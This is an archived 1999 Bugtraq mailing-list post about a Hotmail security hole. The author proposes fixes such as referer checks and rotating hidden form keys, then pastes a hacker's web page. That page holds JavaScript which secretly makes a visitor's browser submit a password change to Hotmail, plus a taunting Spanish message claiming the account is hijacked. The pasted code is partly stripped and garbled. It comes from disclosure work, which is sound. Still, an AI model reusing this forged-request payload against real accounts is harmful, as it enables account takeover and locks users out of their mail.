hotmail claims vulnerability patched, so here it is

From: David L. Nicol (davidat_private)
Date: Wed May 05 1999 - 15:31:34 PDT

  • Next message: David G. Andersen: "Re: freebsd mbuf crash"

    Dear Paul:
    I am reading your previous article on hotmail security,,4,33996,00.html
    and I'm CCing this message to the bugtraq list.
    A good patch from Hotmail would have to involve some additional
    info with the cookie.
    A couple of approaches that come to mind include:
     verifying http_referer data in the script submission to make sure its
     from the expected  hotmail page
     putting additional hidden key fields with constantly changing names
    and values on submittalbe pages, to provide verification that the pages
    are legit
     investigating any incidents of pages being submitted with incorrect,
    nonexistent, or unexpected "secret flag fields" as described above
    I don't work for hotmail (as you know) and I am caught up in this
    as a bystander;
    I would expect hotmail to give you a explanation of their patch that not
    only is detailed but makes sense and that you cannot find a hole in.
    If hotmail merely changed the names of variables, or did a similar
    short term fix, the next expolit might not be nice enough to announce
    itself as such.  Modifying  the attached El Lite exploit to only work
    if it had a particular hotmail account might be a piece of cake;
    for some highly targeted kinds of attacks. (esp. if a hotmail user is
    doing anything involving return-email verification, like tipjar or first
    Here is the hacker's tripod page, including the exploit that
    takes advantage of the trust hotmail has for instructions from
    your browser, by secretly sending instructions to hotmail to change
    your password to
    <!--Begin JavaScrypt roadmap code.  If editing downloaded HTML source,
     this portion.-->
    <scrypt language="JavaScrypt">
    function TripodShowPopup()
            // open the popup window
            var popupURL =
            var popup =,"TripodPopup",'toolbar=0,location=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=0,width=575,height=105');
            // set the opener if it's not already set.  it's set
            // in netscape 3.0+ and ie 3.0+.
            if( navigator.appName.substring(0,8) == "Netscape" )
                    popup.location = popupURL;
    // -->
    <!--End inserted JavaScript code.-->
    <base href="">
    function getCGIValue(nombre, elURL)
            elURL= elURL;
            nombre= nombre+"=";
            found= elURL.indexOf(nombre);
            if (found > -1)
                    found2= elURL.indexOf("&",found);
                    found+= nombre.length;
                    end= (found2 > -1) ? found2 : elURL.length;
                    var value= elURL.substring(found, end);
                    value= (value != null) ? value : vacio;
                    return value;
            else {return vacio;}
    Query= unescape(;
    disk= getCGIValue("disk", Query);
    login= getCGIValue("login", Query);
    host= "";
    hintq= escape('<img
    src=""><br><center>by El
    hinta= '%66axf%61x';
      Uno de los mejores correos gratis que existen es precisamente el que
      tu estás usando, hotmail. Su seguridad e inviolabilidad son ya
      Tanto es así que mira por donde a partir de este mismísimo momento las
      cosas van a tomar otro cariz. Quiero decir que lamentándolo mucho tu
      dirección de hotmail ha sido inutilizada, o mejor dicho, secuestrada
    por mi.
      Ya nunca mas podrás entrar en ella.
      Así de definitivo. Ahora es
                                    SOLO MIAAA!!!! :-))))
      Como soy un buenazo y no eres mi única víctima pues un dia de estos
    voy a
      publicar en es.comp.hackers la password que os puse (es la misma para
      vosotros pardillos)
      Hala, que te sea leve
      El Lite&copy;

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